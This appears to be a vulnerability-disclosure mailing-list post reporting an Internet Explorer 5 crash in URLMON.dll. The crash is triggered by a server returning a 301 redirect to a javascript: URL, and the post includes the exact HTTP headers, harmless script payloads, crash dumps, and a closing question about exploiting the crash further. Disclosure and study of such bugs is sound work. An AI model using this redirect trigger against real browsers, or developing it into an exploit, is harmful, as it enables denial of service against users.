IE5 crash

[Dzzie Z <dzzie () YAHOO COM>]

Hi stumbled across this crash for IE..I am on 5.00.2614.3500 in Win98SE it
seems pretty reproducable with an illegal op in URLMON.dll

1) create a web page (local is fine) and put in an image to one of your
servers..this crash dosent even need an image extension on it...just aim it
at a directory or script (works same when URL is requesting image as well)

2) have the server return  the 301 found code with a location of
'javascript:<some js command>' = instant crash of IE...

when I first started playign with this it was crashing explorer, I cant
reproduce the explorer crash anymore...btu I have also updated my scripting
engines and added j++

here are the exact headers sent back and forth to the server on the request
and the crash log...

just to clarify...the 'server: unix' thing is BS i put in when making the
server


[ Browser Request for http://127.0.0.1/ ]
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: 127.0.0.1
Connection: Keep-Alive


[ Server Response Headers ]
HTTP/1.1 301 Moved Permanently
Server: Apache/1.3.11 (Unix)
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 62
Connection: Close
Content-Type: text/html
Location: javascript:with(navigator){n='\n';alert(userAgent+n+platform)}


IEXPLORE caused an invalid page fault in
module URLMON.DLL at 0187:77037fb8.
Registers:
EAX=00000000 CS=0187 EIP=77037fb8 EFLGS=00010206
EBX=00000000 SS=018f ESP=017beb08 EBP=017beb30
ECX=77034258 DS=018f ESI=00434048 FS=4c77
EDX=81706d60 ES=018f EDI=00000001 GS=0000
Bytes at CS:EIP:
8b 08 50 ff 51 18 6a 00 8b ce 8b f8 e8 82 c3 ff
Stack dump:
00000000 00000001 00433ec0 77037d5e 00434048 00000000 00000000 7af2a370
01149a60 00000000 017beb60 7ad906c0 00000001 00000000 01149b48 01149a60


==============================================

[ Browser Req for 127.0.0.1/image.gif ]
GET /image.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: 127.0.0.1
Connection: Keep-Alive


[ Server Response Headers ]
HTTP/1.1 301 Moved Permanently
Server: Apache/1.3.11 (Unix)
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 86
Connection: Close
Content-Type: text/html
Location: javascript:document.write('IE is so BUGGY'+' of course we are
kind of abusing it too')


IEXPLORE caused an invalid page fault in
module URLMON.DLL at 0187:77037fb8.
Registers:
EAX=00000000 CS=0187 EIP=77037fb8 EFLGS=00010202
EBX=00000000 SS=018f ESP=017beb08 EBP=017beb30
ECX=77034258 DS=018f ESI=0043407c FS=4c1f
EDX=8171e8c4 ES=018f EDI=00000001 GS=0000
Bytes at CS:EIP:
8b 08 50 ff 51 18 6a 00 8b ce 8b f8 e8 82 c3 ff
Stack dump:
00000000 00000001 00433ef4 77037d5e 0043407c 00000000 00000000 7af2a370
01149cd0 00000000 017beb60 7ad906c0 00000001 00000000 01149db8 01149cd0


the question is...

can anything more intresting be done with this crash?
can anyone else reproduce?